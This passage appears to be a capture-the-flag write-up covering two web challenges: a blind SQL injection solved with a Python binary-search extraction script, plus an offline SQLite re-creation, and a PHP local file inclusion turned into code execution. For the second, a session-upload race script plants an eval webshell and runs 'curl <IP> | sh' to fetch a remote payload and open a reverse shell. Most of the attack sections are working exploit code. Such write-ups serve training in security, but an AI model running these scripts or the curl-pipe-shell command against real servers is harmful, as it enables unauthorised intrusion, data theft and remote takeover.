More random enumeration showed that only the S in sql is uppercase, i.e. flag{Sql_1nj3cti0n_1s_s0_easy}, which was accepted.

```python
import requests
import re

cookies = {'PHPSESSID': '_______________'}
RE = re.compile(r'detail\.php\?id=(\d+)')

def clear_list():
    requests.get('http://120.79.141.85:47930/empty.php', cookies=cookies)

def add_ads(title):
    global aid
    payload = {'title': title, 'content': 'Elaina is best', 'ac': 'add'}
    r = requests.post('http://120.79.141.85:47930/addads.php', cookies=cookies, data=payload)
    aid += 1
    assert '已发送申请' in r.text, title   # "application submitted"

def check_sql(sql):
    global aid
    if aid % 10 == 0:
        clear_list()
        add_ads('1')
    sql = sql.replace(' ', '/**/')
    add_ads(f"'||{sql}||'")
    requests.get(f'http://120.79.141.85:47930/index.php', cookies=cookies)
    r = requests.get(f'http://120.79.141.85:47930/detail.php', params={'id': str(aid)}, cookies=cookies)
    return '待管理确认' in r.text   # "pending admin confirmation": the ad rendered, so the condition was true

class CharBinarySearch:
    def __init__(self):
        self.l = 0
        self.r = 128

    def is_done(self):
        return self.l + 1 >= self.r

    def middle(self):
        return (self.l + self.r) // 2

    def update(self, r):
        if r:
            self.l = self.middle()
        else:
            self.r = self.middle()

def main():
    global aid
    aid = 0

    clear_list()
    add_ads('1')
    r = requests.post('http://120.79.141.85:47930/index.php', cookies=cookies)
    aid = int(re.search(RE, r.text).group(1))
    print(f'Initial ID: {aid}')

    # # the column count can be brute-forced
    # for i in range(1, 64):
    #     s = ','.join(["''"] * i)
    #     r = check_sql(f"(SELECT (SELECT {s})<(SELECT * FROM flag LIMIT 1))=true")
    #     print(i, r)

    content = ''
    for i in range(len(content) + 1, 128):
        s = CharBinarySearch()
        while not s.is_done():
            # r = check_sql(f"(SELECT HEX(SUBSTR(database(),{i},1))>=HEX({s.middle()}))")

            p = content + chr(s.middle())
            p = hex(int.from_bytes(p.encode(), 'big'))   # hex literal: no quotes needed in the payload
            r = check_sql(f"(SELECT (SELECT * FROM flag) >= (SELECT 1, {p})) = 1")
            # r = check_sql(f"((SELECT HEX(SUBSTR(name,{i},1)) FROM users LIMIT 1 OFFSET 0)>=HEX({s.middle()}))")

            print(f'{i} {s.middle()} => {r}')
            s.update(r)
        content += chr(s.l)
        print(content)

if __name__ == '__main__':
    main()
```
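Added example, not part of the pasted writeup: the row-value comparison trick run against a local SQLite stand-in, so the search logic can be exercised offline. The table, the flag value and the oracle are constructed; the real target leaked the bit through the ad-detail page, and the real payload used MariaDB hex literals (`0x...`) where this uses a bound parameter. SQLite's default string comparison is case-sensitive, so unlike the case-insensitive comparison the author hit on MariaDB, this recovers the exact string.

```python
import sqlite3

# Offline stand-in for the target database. The table layout and flag are
# constructed; the attacker is assumed not to know the column names.
SECRET_FLAG = "flag{Sql_1nj3cti0n_1s_s0_easy}"


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE flag(id INTEGER, flag TEXT)")
    con.execute("INSERT INTO flag VALUES (1, ?)", (SECRET_FLAG,))
    return con


def oracle(con, guess):
    """The one bit the ad-detail page leaks: is the whole flag row >= (1, guess)?
    Row values compare column by column, so no column name is needed; the
    injected form on the target was (SELECT * FROM flag) >= (SELECT 1, 0x...)."""
    (res,) = con.execute(
        "SELECT (SELECT * FROM flag) >= (SELECT 1, ?)", (guess,)).fetchone()
    return res == 1


def extract(con, max_len=64):
    """Binary-search each next character over [0, 128): about 7 oracle calls
    per character instead of up to 127 with a linear scan."""
    content = ""
    for _ in range(max_len):
        lo, hi = 0, 128          # invariant: prefix+chr(lo) fits, prefix+chr(hi) does not
        while lo + 1 < hi:
            mid = (lo + hi) // 2
            if oracle(con, content + chr(mid)):
                lo = mid
            else:
                hi = mid
        if lo == 0:              # nothing >= chr(1) fits any more: end of the string
            break
        content += chr(lo)
    return content


if __name__ == "__main__":
    print(extract(make_db()))
```

The comparison is lexicographic on the whole row, which is why the prefix found so far is re-sent with every probe: once the known prefix matches, the next character alone decides the ordering, and the string ends when no character at all makes the guess small enough.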

Web | in (138pt)

Clicking around, http://119.23.247.96:45837/action.php?file=2.txt can read files. Trying to include action.php itself hangs with no output, which suggests the inclusion is done with include.
The server is Apache, so including the log to get a shell is not an option; look at the PHP source instead.
Read the source through the filter wrapper: http://119.23.247.96:45837/action.php?file=php://filter/convert.base64-encode/resource=action.php
It starts with session_start(), so this is most likely session file inclusion; being lazy, I used the session race-condition template to get a shell.

```python
import io
import requests
import threading

sessid = 'TGAO'
data = {"cmd": "system('curl 106.52.237.196 | sh');"}


def write(session):
    # keep uploading so the session file containing PHP_SESSION_UPLOAD_PROGRESS exists
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post('http://119.23.247.96:45837/action.php',
                            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'},
                            files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})


def read(session):
    # race: include the session file before PHP cleans it up
    while True:
        resp = session.post('http://119.23.247.96:45837/action.php?file=/tmp/sess_' + sessid, data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()


if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
        event.set()
```

Right after running it, a reverse shell arrived on the VPS (it probably does not need to be this brute-force).

Method 2:
Read the source of action.php: http://119.23.247.96:47473/action.php?file=php://filter/convert.base64-encode/resource=action.php

```php
<?php
session_start();
error_reporting(0);
$name = $_POST['name'];
if($name){
    $_SESSION["username"] = $name;
}
include($_GET['file']);
?>
```

So this is session file inclusion: the session file lives at /tmp/sess_PHPSESSID, so write a webshell into it, then ls / to get the flag file name and read it.

[image: image-20240505005630813]